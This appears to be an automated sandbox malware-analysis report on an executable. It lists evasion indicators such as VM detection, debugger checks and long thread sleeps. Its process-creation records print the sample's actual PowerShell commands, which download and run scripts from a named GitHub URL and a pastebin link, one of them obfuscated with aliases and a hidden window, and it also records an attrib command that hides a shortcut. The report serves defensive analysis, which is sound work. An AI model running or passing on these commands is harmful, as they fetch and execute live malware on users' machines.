Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1137E152 rdtsc 18_2_00007FFB1137E152
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2894Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 428Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4298Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5459Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2249Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 567Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5133Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4544Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dllJump to dropped file
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeAPI coverage: 7.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 4298 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 5459 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -23980767295822402s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 2249 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 567 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep count: 5133 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep count: 4544 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep count: 1311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 102 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3316Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep count: 4747 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep count: 5024 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0068B063 FindFirstFileExW,0_2_0068B063
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029DDD60 GetSystemInfo,4_2_029DDD60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.11.drBinary or memory string: VMware
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.000000000132E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2109223488.00000204FD342000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000004.00000002.1835795117.00000000083B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.11.drBinary or memory string: vmci.sys
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 9c 31 6b 7d 78 89-be 90 b3 22 a5 ab 1b 52
Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.drBinary or memory string: VMware20,1
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB1137E152 rdtsc 18_2_00007FFB1137E152
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0067E9F7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067E9F7
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0068E436 GetProcessHeap,0_2_0068E436
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0067E9F7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067E9F7
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_00678B08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00678B08
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_00678E10 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00678E10
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_00678F9D SetUnhandledExceptionFilter,0_2_00678F9D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0067888C cpuid 0_2_0067888C
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_0068D864
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: GetLocaleInfoW,0_2_0068E103
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0068E1D9
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: EnumSystemLocalesW,0_2_00686AB1
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: EnumSystemLocalesW,0_2_0068DB5B
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: EnumSystemLocalesW,0_2_0068DB10
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: EnumSystemLocalesW,0_2_0068DBF6
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0068DC81
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: GetLocaleInfoW,0_2_0068DED4
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0068DFFD
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: GetLocaleInfoW,0_2_00686F80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
